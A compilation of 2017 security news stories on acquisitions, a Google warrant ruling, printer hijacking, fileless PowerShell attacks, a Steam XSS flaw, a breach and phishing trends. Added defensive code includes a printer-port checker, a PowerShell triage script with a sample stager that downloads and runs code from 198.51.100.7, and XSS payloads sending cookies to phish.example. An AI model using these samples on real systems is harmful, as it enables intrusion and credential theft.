STE WILLIAMS

Sophos Acquisition Targets Endpoint Security

Sophos buys Invincea to bring next-gen malware protection and machine learning into its product portfolio.

Sophos has agreed to acquire endpoint security firm Invincea for $100M to strengthen its product lineup with new malware protection technology.

Invincea was founded to address zero-day security threats with non-signature-based technologies to protect businesses against advanced threats. Flagship product X by Invincea uses deep learning neural networks and behavioral monitoring to find unknown malware and prevent damage before it hits.

Sophos plans to integrate Invincea’s machine learning technology into its endpoint protection portfolio. Invincea will continue to sell and support its endpoint security portfolio. The separately managed division of Invincea Labs is not part of this acquisition.

“Invincea will strengthen Sophos’ leading next-gen endpoint protection with complementary predictive defenses that we believe will become increasingly important to the future of endpoint protection and allow us to take full advantage of this significant new growth opportunity,” said Sophos CEO Kris Hagerman in a statement.

Read more on the Sophos blog.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: http://www.darkreading.com/endpoint/sophos-acquisition-targets-endpoint-security/d/d-id/1328085?_mc=RSS_DR_EDT

Facebook Aims To Shape Stronger Security Practices

Facebook is among social platforms focusing on security as social media poses a growing risk to individuals and businesses.

Social media poses a silent but deadly risk to organizations as users adopt a generally relaxed approach to sharing personal and corporate data. IT pros are challenged to secure the constant flood of social activity on business networks.

“It’s one of those necessary evils,” says Dr. Amelia Estwick, program manager for the National Cybersecurity Institute at Excelsior College, of social networking. “Now, we can’t imagine our lives without it.”

But social media firms such as Facebook are also raising the bar on security, a move that could ultimately help promote better security practices on their platforms. Take Facebook’s announcement last month that it now supports physical keys based on the FIDO U2F standard for stronger authentication of user accounts. Users can register keys to their Facebook accounts so that when they log in, they tap a device plugged into their computer’s USB port.

Brad Hill, security engineer at Facebook, acknowledges the need for stronger security on social networks and explains the company’s recent efforts to drive change in the industry, specifically for login security and account recovery.

“Security is on everyone’s mind right now, on social media, email, etc.,” he says. “Everyone is looking for ways they can feel more secure in their online identities and the things they do online. We want to continue making security easier.”

Social media’s rampant growth, including that of Facebook, has basically opened the door for malware distribution, social engineering, data mining, and a flood of other security threats. 

Evan Blair, co-founder and chief business officer at social media security firm ZeroFOX, explains how hackers are starting to take advantage: “That fundamental scale has created an interesting opportunity for cybercriminals because they can target or exploit virtually any individual, at any organization around the world,” he continues. “Everyone is available; everyone is accessible on social media.”

People place more trust in their social accounts than they do in email, Blair continues. We’re taught to be wary of emailed links, even from those we trust, but we’re quick to share personally identifiable information or click links on Facebook, Twitter, and Instagram.

“Because we have no baseline security, we’re highly vulnerable to social engineering and spearphishing campaigns,” he says, noting how the human interaction on social media drives users’ trust in platforms. “The amount of information we share makes us a ripe target.”

Companies like Facebook are recognizing the immediate threat to consumers and businesses and launching new initiatives to mitigate risk.

Facebook is a particularly appealing target for threat actors given the scope of its platform, explains Dr. Estwick. “The reason I see Facebook as a bigger problem is the amount of services it provides now,” she says. “On Twitter, you send a tweet. On Facebook, you have Facebook Live, Instagram … I don’t think users understand what they’re getting themselves into when they create a Facebook account.”

Facebook Fights Back

On January 26, Facebook announced its support for physical keys for authentication. Facebook’s Hill explains how the physical keys make accounts “immune to phishing”: users never type a code that a fake site could relay, and the key answers each login with a signature over a challenge that the browser ties to the site’s real origin, so a signature collected on a look-alike domain is useless against the genuine one. While users won’t be required to use them, the keys are an obvious choice for people using social media for business.

“There’s no way you can make a mistake,” he says. “Attackers can’t compromise it, you can’t accidentally give your credentials away.”

Further, users can employ the same key for several accounts including Google, Salesforce, Dropbox, and GitHub. Hill hopes by jumping in on this trend, Facebook will encourage users to adopt stronger security measures.

Shortly after it announced U2F security key support, Facebook shared a project with GitHub focused on account recovery. GitHub users can use their Facebook accounts for authentication as part of the GitHub account recovery process.

The idea is to give users an easier and more secure option to recover their accounts. Common methods like recovery emails, SMS messages, and security questions are viewed as both inconvenient and risky as more people go online, Hill says.

Users can set this up by saving an encrypted recovery token with their Facebook account. If they need to recover a GitHub account, they can re-authenticate to Facebook and the token is sent back to GitHub for verification.

“People will always forget their passwords or lose their phones, and we want to make sure they have ways to get into their accounts,” says Hill. “Interconnecting networks offers a better option than centralizing things around one account or security questions. We know that stuff isn’t secure.”

Meantime, social media will continue to be a big target of attackers, ZeroFOX’s Blair says.

“We will see more targeted attacks across social media,” he says. “We already see a ton making headlines, but we’re going to see more hackers targeting employees to gain access to corporate systems. That will continue to become a problem.”

On the enterprise side, collaboration apps like Slack will pose a threat despite their intent to drive productivity. Organizations lack control over critical functions: what information is requested of them, which customers and partners join the app, how they engage.

Each social network will tackle the problem differently. Facebook has already started to ramp up its security game and anticipates other platforms will follow suit, experts say.

“We definitely have a huge audience; everybody uses Facebook,” says Hill. “I think we’re also a player other people in the industry watch. Security-key technology is something the whole industry should be adopting.”


Kelly is an associate editor for InformationWeek. She most recently reported on financial tech for Insurance Technology, before which she was a staff writer for InformationWeek and InformationWeek Education. When she’s not catching up on the latest in tech, Kelly enjoys …

Article source: http://www.darkreading.com/vulnerabilities---threats/facebook-aims-to-shape-stronger-security-practices/d/d-id/1328082?_mc=RSS_DR_EDT

Why did a judge order Google to hand over emails from outside the US?

Surprising many privacy advocates, US magistrate Judge Thomas Rueter has ruled that Google must turn over email contents demanded by the FBI through a court-approved warrant, even where those contents are stored outside the United States.

Why a surprise? Because a regional US appeals court –  that’s one step below the Supreme Court – had recently heartened them by taking the opposite view in a case involving Microsoft.

In the Microsoft case, involving narcotics trafficking, the US government sought content from emails stored on Microsoft’s servers in Dublin, Ireland. While the official court papers don’t indicate whether the customer was a US citizen, he or she evidently isn’t. A lower court required Microsoft to comply with the government order, and even found it in contempt when it did not do so. A small panel of the appeals court reversed that decision, and by a 4-4 vote, the entire appeals court refused to reconsider.

The facts of the Google case were a bit different. Here, the warrant relates to a US citizen being investigated for fraud committed in the US. Moreover, Google stores email in a complex global cloud of servers, and constantly moves message fragments around to optimize network performance. That means some email may be stored in the US, some partly in the US, some entirely overseas – and the mixture can change dynamically from instant to instant.

In responding to the government’s warrant, Google provided all the emails it knew were located in the US at that moment. But, relying on the recent Microsoft decision, it provided no emails it believed were stored elsewhere. According to Judge Rueter’s decision, that won’t fly: Google needs to provide all of them.

Rueter argued that Google is subject to the “well-established principle that a court’s power to require a person to disclose information applies to all information in that person’s custody or control, regardless of where the information is located” – and this data is solely controlled by Google employees in California. He then performed a complex analysis to determine whether enforcing the subpoena would be “an unlawful extraterritorial application of the 1986 Stored Communication Act,” concluding that it is not.

In his (controversial) view, the data isn’t being “seized” in a foreign country, because “seizure” implies that the user has lost some meaningful aspect of the possession of his property. But Google routinely moves data from and to the US, and users never even notice – simply moving data creates no “meaningful interference with the account owner’s control over his information”. His reasoning continues: the actual search of the email’s contents only happens within the US, so a government warrant for a domestic search is sufficient.

It’s important to understand just how fluid American law is when it comes to these email warrants, and how tenuous the protections that the Microsoft case has seemed to offer.

Unsurprisingly, Google has already announced that it will appeal Rueter’s decision. And it’s only been two weeks since the appeals court denied the government’s request for a rehearing in the Microsoft case by a tied 4-4 vote. The government might still appeal to the US Supreme Court, and given the closeness of the appeals court decision, the Supreme Court might well agree to consider its appeal.

Since the July 2016 Microsoft decision was made by a regional court, it isn’t technically binding nationwide. But many leading service providers have been treating it as if it is, extending greater privacy protections to customers unless forced to do otherwise by another court (as Rueter is attempting to do).

However, one key judge who supported Microsoft in the first case said things would “look rather different… if the American government is demanding from an American company emails of an American citizen resident in the US, which are accessible at the push of a button in [the US] and which are stored on a [foreign] server… solely for reasons of convenience and that could be changed… at the whim of the American company”. That sounds quite a lot like the Google case.

The government has argued that if the Microsoft decision stands, there would be no way for any law enforcement official anywhere to legally access an email that might be stored on a foreign server. It would be “beyond the reach” of a US warrant “even when the account owner resides in the United States and the crime under investigation is entirely domestic”.

And it would be beyond the reach of foreign law enforcement, because non-US law enforcement agencies have no power over the Google employees in California who are the only individuals capable of accessing that content. Rueter notes that, in oral arguments before his court, Google’s attorneys said the only way the government could get this data was to “work to reform” the 1986 law these warrants are based on.

Many observers do think that law is obsolete in the era of cloud computing, and do expect Congress to revise it. Meanwhile, of course, the US administration has changed; and while Donald Trump’s incoming attorney-general Jeff Sessions hasn’t yet said whether he’ll appeal, he has said that Congress should change the law so the Microsoft decision doesn’t stand.

Needless to say, the American privacy and technology communities are closely watching what happens next in both the Google and Microsoft cases. But so are foreigners – many of whom are already concerned about the privacy of cloud services whose data is controlled by US companies.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/V7buLUjZGuw/

Hacker pwns 150,000 printers to issue a security warning

If your printer unexpectedly output a strange message over the weekend in the IBM Courier typeface complete with an ASCII-generated image of a robot, then you weren’t alone.

It seems that the owners of up to 150,000 printers around the world received the same message:

Stackoverflowin has returned to his glory,  your printer is part of a botnet, the god has returned, everyone likes a meme, fix your bulls***… For the love of God, please close this port, skid.

Over a period of 24 hours, slightly different versions of the same message emerged from printers made by manufacturers including HP, Brother, Dell, Canon, Samsung, Epson, Lexmark, Oki and Ricoh.

The culprit, Stackoverflowin, wasn’t exactly trying to hide himself, helpfully signing off the document with contact email and Twitter handles (the latter now suspended).

The issue of printer security – or the lack of it – has been bubbling under for years. Only days ago, as reported in Naked Security, German researchers published the results of tests they had carried out to assess security on a cross-section of office networked printers.

Among a clutch of security problems they uncovered were several ways to exploit access to networked printers through what is termed RAW printing on port 9100.

Popularised by HP’s JetDirect in the 1990s, port 9100 accepts raw print jobs, and the Printer Job Language (PJL) commands carried over it also gave admins a way to do remote maintenance. Other examples of direct access include the Internet Printing Protocol (IPP) on port 631 and the old Unix Line Printer Daemon (LPD) on port 515.

Why so many confusing ways to connect to printers? Mostly, it’s to do with history and manufacturers coming up with their own way to do things which have accumulated over time. It’s easy to forget that printers have been around for decades.

In an email interview, Stackoverflowin said the attack was executed using scripts targeting these direct ports, while Dell printers were hit with an exploit for a remote code execution vulnerability.

Obviously there’s no botnet. People have done this in the past and sent racist flyers etc. I’m not about that, I’m about helping people to fix their problem, but having a bit of fun at the same time ; ) Everyone’s been cool about it and thanked me to be honest.

The “racist flyers” incident refers to an attack last March in which printers at US universities spewed Nazi propaganda after infamous hacker Weev researched easy targets on Shodan.

Given this history of incidents, what can be done to defend networked printers?

A target list of 150,000 is small compared to the world population of printers, which must run to a billion or more. The attacks are warnings, but still quite small ones.

Nevertheless, a troubling minority of internet-accessible and networked printers clearly haven’t been secured via their management interfaces, possibly because they are not seen as vulnerable. For an external attacker to reach a networked printer on port 9100, 631 or 515, something has also gone skew-whiff at the firewall level.

Meanwhile, is your printer potentially vulnerable? Every printer is different, so do check your specific model, but

  • The affected printers are all networked models – and that could well include wireless printers
  • If your printer has built-in management, make sure you’ve properly secured it from remote access – starting with changing the default password
  • Make sure your firewall is properly configured
  • Don’t leave your printer switched on if you’re not using it
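A quick way to carry out the checks above from the outside, as an added example (not Naked Security’s or the German researchers’ code): it attempts a TCP connect to the three direct-access ports and, on 9100, asks the printer who it is with the read-only PJL query @PJL INFO ID. A fake printer on the loopback interface is included so the code runs offline; the model strings it returns are made up. Run it only against printers you own or are authorised to test.

```python
import re, socket, threading

PRINTER_PORTS = {9100: "raw (JetDirect/PJL)", 631: "IPP", 515: "LPD"}
UEL = b"\x1b%-12345X"   # PJL Universal Exit Language, brackets every PJL exchange

def exposed_printer_ports(host, ports=PRINTER_PORTS, timeout=1.0):
    """Return {port: protocol} for each printer port that accepts a TCP connect."""
    found = {}
    for port, proto in ports.items():
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found[port] = proto
        except OSError:
            pass
    return found

def parse_pjl_info_id(reply):
    """Pull the model string out of an '@PJL INFO ID' reply, which ends in a form feed."""
    m = re.search(rb'@PJL INFO ID\r\n"?([^"\r\n]*)"?\r\n\x0c', reply)
    return m.group(1).decode(errors="replace") if m else None

def pjl_info_id(host, port=9100, timeout=3.0):
    """Ask a raw-port printer for its identity. INFO ID only reads; nothing is printed."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(UEL + b"@PJL INFO ID\r\n" + UEL)
        data = b""
        while not data.endswith(b"\x0c"):
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
    return parse_pjl_info_id(data)

def free_local_port():
    """A loopback port that is currently closed (used to show the negative case)."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

def fake_printer(model="ExampleJet 9000"):
    """Constructed stand-in for a printer's port 9100 so the example runs offline.
    Serves one connection, answers INFO ID, then shuts down. Returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    def serve():
        try:
            conn, _ = srv.accept()
            with conn:
                conn.recv(1024)
                conn.sendall(b'@PJL INFO ID\r\n"' + model.encode() + b'"\r\n\x0c')
        except OSError:
            pass
        finally:
            srv.close()
    threading.Thread(target=serve, daemon=True).start()
    return port

if __name__ == "__main__":
    port = fake_printer("Brother HL-Example")
    print(exposed_printer_ports("127.0.0.1", {port: "raw (fake)"}))  # fake port listed
    port = fake_printer("Brother HL-Example")
    print(pjl_info_id("127.0.0.1", port))                            # Brother HL-Example
```

Point exposed_printer_ports at your own public address from outside the network: if any of the three ports answers, the firewall rule the article mentions is missing, and INFO ID tells you exactly which model is listening.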

It does serve as a reminder that the old box in the corner is not just another harmless printing workhorse. Poorly configured, a printer can be an inky route into anyone’s home or business.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/EepUbSI1gi0/

Sophos to assimilate Invincea’s intelligent machine tech to fight malware

Sophos has announced a deal to acquire the core technologies of anti-malware protection outfit Invincea for $100m plus up to $20m, dependent on first-year revenues.

Invincea makes a line of signature-less endpoint protection technologies that rely on machine learning and behavioural monitoring to block malware.

Sophos plans to integrate Invincea’s tech into the Sophos Central endpoint product line, before releasing revamped products later this year. The plan parallels the integration of SurfRight’s technology into Sophos’s product line following a smaller December 2015 acquisition.

In the 12 months to 31 March 2016, Invincea recorded billings of $13.4m, revenue of $9.8m and a loss before tax of $11.8m.

Invincea Labs, a division of Invincea that has been separately managed and operated since 2010, will be spun out prior to the acquisition and does not form part of this transaction.

Sophos expects to complete the acquisition around the end of this fiscal year. It anticipates the deal to be “broadly neutral” to its balance sheet in its first year before adding to its revenues thereafter.

Sophos CEO Kris Hagerman commented: “Invincea is leading the market in machine learning-based threat detection with the combination of superior detection rates and minimal false positives. Invincea will strengthen Sophos’s leading next-gen endpoint protection with complementary predictive defences that we believe will become increasingly important to the future of endpoint protection and allow us to take full advantage of this significant new growth opportunity.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/02/08/sophos_invincea/

Revealed: Malware that skulks in memory, invisibly collecting sysadmins’ passwords

Cybercriminals have hit scores of enterprises in 40 countries using hidden malware.

Banks, telecommunication companies and government organisations in the US, South America, Europe and Africa have already been hit by the ongoing (and stealthy) attacks.

Kaspersky Lab experts report that the attacks harness widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows. Malicious code resides only in memory, they say.

Hackers behind the attack have apparently taken pains to avoid writing files onto the hard drive of compromised PCs, a tactic designed to foil both whitelisting technologies and post-breach forensic analysis. The crooks are using anti-forensic techniques uncommon in everyday assaults.

“The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot,” according to Kaspersky Lab boffins.

Kaspersky Lab experts were set on the trail on the malware campaign by “banks in CIS which had found the penetration-testing software, Meterpreter, now often used for malicious purposes, in the memory of their servers when it was not supposed to be there”. The Meterpreter code was combined with a number of legitimate PowerShell scripts and other utilities. The combined tools had been adapted into malicious code that could hide in the memory, invisibly collecting the passwords of system administrators.
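Tradecraft like this leaves little on disk, but it does leave process command lines and PowerShell script-block logs. The following is an added example in Python (not Kaspersky’s tooling) that decodes -EncodedCommand payloads and scores command lines for the in-memory staging indicators the article describes; the log lines, the indicator list and the 198.51.100.7 address are constructed samples, not data from the report.

```python
import base64, re

# Indicator patterns for PowerShell command lines that stage code in memory.
# Each regex maps to the behaviour it suggests; tune the list to your estate.
INDICATORS = {
    r"\bIEX\b|Invoke-Expression": "executes a string as code (in-memory)",
    r"DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest": "pulls a payload over the network",
    r"\[(System\.)?Reflection\.Assembly\]::Load": "reflective .NET assembly load",
    r"VirtualAlloc|WriteProcessMemory|CreateRemoteThread": "shellcode/injection primitives",
    r"FromBase64String": "inline base64 payload",
    r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-noprofile|-noninteractive": "interactive-session evasion switches",
}

def expand_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    indicators are matched against the script the operator actually ran."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return cmdline + "\n" + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def triage(cmdline):
    """Return the behaviours indicated by one process command line."""
    text = expand_encoded_command(cmdline)
    return [why for pat, why in INDICATORS.items() if re.search(pat, text, re.I)]

def triage_log(lines, threshold=2):
    """Keep only command lines that trip at least `threshold` indicators."""
    out = []
    for line in lines:
        hits = triage(line)
        if len(hits) >= threshold:
            out.append((line[:60], hits))
    return out

# Constructed sample process-creation log (not from the Kaspersky report):
# a hidden PowerShell fetching and running a stager without touching disk.
_stager = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
_enc = base64.b64encode(_stager.encode("utf-16-le")).decode()
SAMPLE_LINES = [
    f"powershell.exe -nop -w hidden -enc {_enc}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly_backup.ps1",
    "powershell.exe -c \"[Reflection.Assembly]::Load([Convert]::FromBase64String($b))\"",
]

if __name__ == "__main__":
    for head, hits in triage_log(SAMPLE_LINES):
        print(head, "->", hits)
```

Feed it the CommandLine field from Sysmon event 1 or Windows event 4688 (with command-line auditing enabled); the decode step matters because the interesting strings live inside the base64 blob, not in the visible arguments.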

The ultimate goal of the attack appears to be access to financial processes. Kaspersky Lab subsequently discovered that the same types of attack were occurring on an industrial scale worldwide, hitting more than 140 enterprise networks in a range of business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK and Russia.

It’s unclear who is behind the attacks. “The use of open source exploit code, common Windows utilities and unknown domains makes it almost impossible to determine the group responsible – or even whether it is a single group or several groups sharing the same tools,” according to Kaspersky Lab.

Known groups that have the most similar approaches are GCMAN and Carbanak, who therefore both count as suspects.

Details of the second part of the operation, showing how the attackers used unique tactics to withdraw money through ATMs, are due to be presented at Kaspersky Lab’s Security Analyst Summit in April. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/02/08/hidden_malware_menaces_enterprises/

XSS marks the spot: Steam vuln dangles potential phishing line

Security researchers have discovered a significant security vulnerability in Steam, Valve’s digital distribution platform for PC gaming.

The bug, which has since been patched, allowed users to add malicious code to their profile, bypassing Steam’s security measures. The trick, discovered by security researcher cra0kalo, could have been used to redirect victims to a phishing website or a page loaded with malware, among other exploits.

El Reg invited Valve to comment on the vulnerability, but we’re yet to hear back and will update this story when we learn more.

Valve has a history of cross-site scripting (XSS) problems, as internet security watchers have been quick to note, and this one is more serious than most. The gaming platform needs to go to the next level on security in response to heightened threats.

Daniel Miessler, director of advisory services at ethical hacking firm IOActive, commented: “Video games have become mainstream, and along with that popularity has come insecurity. The XSS attack against Steam is an oldie but a goodie, known as persistent XSS. It’s called persistent because the attacker makes a change to something relatively static, like a profile, and then anyone who visits that page gets the payload. This is the same type of attack that took down MySpace back in the day.”
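The persistent-XSS pattern Miessler describes, as an added example in Python rather than anything from the Steam report (whose exact payload and filter were not published): a profile renderer that relies on a blocklist and is bypassed by an inline event handler and a javascript: URL, beside one that escapes on output. The payloads, the phish.example host and the field names are constructed for the demo.

```python
import html, re

# Constructed profile-field payloads of the kind a stored-XSS attacker submits;
# none of these is the actual Steam payload, which was not published.
PAYLOADS = [
    '<script>document.location="https://phish.example/?c="+document.cookie</script>',
    '<img src=x onerror="document.location=\'https://phish.example/login\'">',
    '<a href="javascript:fetch(\'https://phish.example/\'+document.cookie)">free items</a>',
]

def strip_script_tags(value):
    """Blocklist 'sanitiser' of the sort that gets bypassed: it removes <script>
    elements and nothing else."""
    return re.sub(r"<\s*/?\s*script\b[^>]*>", "", value, flags=re.I)

def render_profile_vulnerable(display_name, summary):
    """Stored XSS: user text passes a blocklist and is then interpolated
    into the page as markup, so anyone viewing the profile runs it."""
    return (f"<h1 class='name'>{strip_script_tags(display_name)}</h1>\n"
            f"<div class='summary'>{strip_script_tags(summary)}</div>")

def render_profile_safe(display_name, summary):
    """Output encoding: every user-controlled value is HTML-escaped at the
    point it enters the page, so the browser treats it as text."""
    return (f"<h1 class='name'>{html.escape(display_name, quote=True)}</h1>\n"
            f"<div class='summary'>{html.escape(summary, quote=True)}</div>")

ACTIVE = re.compile(r"""<script\b|<[a-z][^>]*\son[a-z]+\s*=|href\s*=\s*['"]?\s*javascript:""", re.I)

def has_active_content(fragment):
    """Rough check for markup a browser would execute (script element, inline
    event handler, javascript: URL); fine for an example, not a real filter."""
    return bool(ACTIVE.search(fragment))

def audit(renderer):
    """Which constructed payloads survive a given renderer as live markup?"""
    return [p for p in PAYLOADS if has_active_content(renderer("player", p))]

if __name__ == "__main__":
    print(len(audit(render_profile_vulnerable)), "payloads survive the blocklist")  # 2
    print(len(audit(render_profile_safe)), "payloads survive output encoding")      # 0
```

The blocklist stops the obvious script element and nothing else; escaping on output stops all three because nothing the user typed is ever parsed as a tag. A Content-Security-Policy without unsafe-inline is the usual second layer for the cases a template misses.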

Miessler helped develop the new OWASP Game Security Framework. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/02/08/steam_vulnerability/

Sports Direct hacked last year, and still hasn’t told its staff of data breach

Exclusive: Sports Direct has left its 30,000-strong workforce in the dark over a data breach in the autumn when a hacker accessed internal systems containing staffers’ personal information.

The Register can reveal the UK’s largest sports retail business was the subject of a digital break-in during September, when an attacker exploited public vulnerabilities affecting the unpatched version of the DNN platform that Sports Direct was using to run a staff portal.

An inside source with knowledge of the incident told The Register that employees’ unencrypted data was stolen during the breach. Sports Direct’s internal systems detected the intrusion in September, but it was not until December that the company learned of the data breach. Our insider claimed a phone number had been left on the company’s internal site with a message encouraging Sports Direct’s bosses to make contact.

Sources told us that as of Monday, staff had still not been notified of the breach, which included names, email and postal addresses, as well as phone numbers.

Sports Direct filed an incident report with the Information Commissioner’s Office after it became aware that its workforce’s information had been compromised, but as there was no evidence that the hacker had made further copies or shared the data, the company did not report the breach to its staff.

A spokesperson for the ICO confirmed to The Register that it was “aware of an incident from 2016 involving Sports Direct” and would be “making enquiries.”

Last year, a Parliamentary inquiry into working practices at Sports Direct [PDF] described the business as “the country’s largest sports retail outlet,” and stated that its “size and success is founded on a business model that enables the majority of workers in both the warehouse at Shirebrook and at the shops around the UK to be treated without dignity or respect.”

Regarding the breach, Unite assistant general secretary Steve Turner told us: “Sports Direct workers will be anxious to know what personal details have been hacked in this apparently serious data breach and why they weren’t immediately informed about it by their employer. This is potentially sensitive and personal information.”

“It’s completely unacceptable that the workers affected appear not to have been informed and the data breach swept under the carpet,” added Turner.

“We will be immediately approaching the company for answers and further details about the potentially damaging impact of this on our members, as well as details about actions taken to ensure personal data is never compromised again,” the union’s assistant general secretary said. “In the meantime we would urge Sports Direct workers to check their financial records, change passwords and immediately report any suspicious activity.”

Unite’s criticism of Sports Direct’s lack of regard for employees is the latest in a string of complaints which have seen the company’s share price more than halve since February 2015, following a number of scandals regarding its alleged mistreatment of employees.

An undercover investigation by The Guardian discovered that the company had been effectively paying workers below the minimum wage. The company subsequently admitted breaking the law and thousands of warehouse workers received back pay totalling £1m.

In November, six MPs from Parliament’s Business and Skills Committee claimed that “an attempt was made to record their private discussions” when they visited the Shirebrook warehouse to investigate working practices.

A spokesman for Sports Direct said: “We cannot comment on operational matters in relation to cyber-security for obvious reasons. However, it is our policy to continually upgrade and improve our systems, and where appropriate we keep the relevant authorities informed.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/02/08/sports_direct_fails_to_inform_staff_over_hack_and_data_breach/

Cloud Storage The New Favorite Target Of Phishing Attacks

2016 data shows that phishing scams involving brands like Google and Dropbox will soon overtake scams involving financial companies, PhishLabs says.

For all the sophisticated tactics, techniques, and procedures employed by threat actors these days, phishing continued to be the top attack vector in 2016, as it has been for some time.

The big difference was that instead of targeting financial services companies, phishers increasingly targeted cloud storage service providers like Google and Dropbox, security vendor PhishLabs said in a voluminous report on phishing trends released this week.

Compared to 2013, when barely 10% of phishing attacks targeted cloud storage services, about 22.5% of phishing attacks last year involved such companies. That was just barely below the 23% of phishing scams involving financial brands, the company noted. What that means is that users are likely to get more phishing emails this year trying to get them to part with their cloud storage credentials.

“Over the last four years, the number of phishing attacks targeting cloud storage services has skyrocketed,” says Crane Hassold, senior security threat researcher at PhishLabs. “Based on recent trends, it is likely that phishing attacks targeting cloud storage services will overtake financial institutions as the top target for phishers in 2017.”

So far at least, almost all phishing attacks affecting this industry have involved only Google and Dropbox.

Many of the phishing campaigns targeting cloud storage providers contain lures saying that a document or picture has been shared with the victim and encourage them to sign in to their account in order to view it.  

A majority of the phishing pages involved in such campaigns have really been poor duplicates of the pages used by Google, Dropbox, and other legitimate sites. Even so, “based on the growing popularity of these types of attacks, phishers must still be having success compromising victims even with this lack of authenticity,” Hassold says.
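A screening check for this lure pattern, as an added example that is not PhishLabs’ code: it looks for the “shared a document” wording and flags any link that invokes Google or Dropbox (in the hostname or the text just before the link) but lands on a domain those brands do not own. The sample messages, the hostnames and the two-label domain simplification are assumptions for the demo.

```python
import re
from urllib.parse import urlparse

# Brands the report names as the cloud-storage targets, with the domains they own.
BRAND_DOMAINS = {"google": {"google.com"}, "dropbox": {"dropbox.com"}}
SHARE_LURE = re.compile(
    r"\b(shared|sent you|invited you to view)\b.{0,40}\b(document|file|photo|picture|folder)\b",
    re.I | re.S)
URL = re.compile(r"""https?://[^\s"'<>)]+""")

def registrable_domain(host):
    """Last two labels of the host. Simplification: a real check consults the
    Public Suffix List so that suffixes like co.uk are handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def spoofed_links(text):
    """Links that invoke a brand (in the hostname or the 80 characters of text
    before the link) but resolve to a domain the brand does not own."""
    hits = []
    for m in URL.finditer(text):
        url = m.group(0)
        host = urlparse(url).hostname or ""
        context = text[max(0, m.start() - 80):m.start()].lower()
        for brand, owned in BRAND_DOMAINS.items():
            mentioned = brand in host.lower() or brand in context
            if mentioned and registrable_domain(host) not in owned:
                hits.append((url, brand))
    return hits

def classify(text):
    """Lure wording plus a spoofed brand link is the signature of this campaign type."""
    lure = bool(SHARE_LURE.search(text))
    spoofed = spoofed_links(text)
    verdict = "phish" if lure and spoofed else ("suspicious" if spoofed else "ok")
    return {"share_lure": lure, "spoofed_links": spoofed, "verdict": verdict}

# Constructed samples, not messages from the PhishLabs report.
PHISH = ("Maria shared a document with you.\n"
         "Sign in to Google Drive to view it:\n"
         "https://drive.google.com.secure-docs-view.net/signin?u=you@example.com\n")
LEGIT = ("Maria shared a document with you.\n"
         "Open in Google Drive: https://drive.google.com/file/d/1AbC/view\n")

if __name__ == "__main__":
    print(classify(PHISH)["verdict"], classify(PHISH)["spoofed_links"])  # phish
    print(classify(LEGIT)["verdict"])                                    # ok
```

The hostname drive.google.com.secure-docs-view.net is the classic trick the check catches: the brand appears as a subdomain, but the registrable domain is the attacker’s.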

The PhishLabs report is based on an analysis of some one million confirmed phishing sites spread across more than 170,000 unique domains, and also from the company’s handling of more than 7,800 phishing attacks per month in 2016. The analysis showed an alarming increase across the board in phishing-related activities. 

The number of phishing sites in 2016, for instance, was 23% higher than the year before, while the volume of phishing emails grew by an average of 33% across financial services, cloud storage/file hosting, webmail/online, payment services, and ecommerce sites.

PhishLabs identified a total of 976 brands belonging to 568 organizations that cybercriminals used in phishing campaigns last year.

The kind of data that phishers went after also broadened considerably last year. In addition to account credentials and personal data, phishers also used their phishing lures to try and snag financial, employment, and account security data like answers to challenge/response questions and mother’s maiden name.

Ransomware’s Best Friend

In 2016, phishing also continued to be by far the most prevalent method for delivering ransomware on everything from end user systems to systems belonging to businesses, government agencies, schools, and critical infrastructure targets.

Driving the surge in phishing-related threats in 2016 was the broad acceptance of email addresses as the username by a growing number of websites.

Using the email address as the login name made it easier for phishers to mass-harvest credentials for all email services on a single phishing site, instead of having to target email providers individually, Hassold says.

“Additionally, because a growing number of Web services are using email as a primary credential, phishers are able to multiply their profits by conducting password reuse attacks against these unsuspecting targets,” he says.

The easy availability of phish kits, or ready-to-use templates for creating working phishing sites, contributed to the problem. PhishLabs counted more than 29,000 unique phish kits with templates for spoofing the websites of over 300 companies. Many of these kits included sophisticated anti-detection mechanisms. Mechanisms included access control measures based on IP address, HTTP referrer, and hostname, whitelists, and blocklists.

“The big takeaway is that we’ve created ideal conditions for the mass harvesting of credentials via phishing attacks,” Hassold notes.

Unlike in the past where phishers were focused on immediate gains—by going after and selling access to financial accounts for instance—they are now trying to maximize the information they can compromise with the least effort.

The goal is to “sell the information for a higher price on the underground market or use the information to attack secondary targets, thus multiplying their gains,” Hassold says.


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: http://www.darkreading.com/attacks-breaches/cloud-storage-the-new-favorite-target-of-phishing-attacks/d/d-id/1328078?_mc=RSS_DR_EDT

Dutch Voter Guide Website Leak Highlights Privacy Concerns

StemWijzer fixes vulnerabilities after researcher discovers website is secretly maintaining voter-preference record.

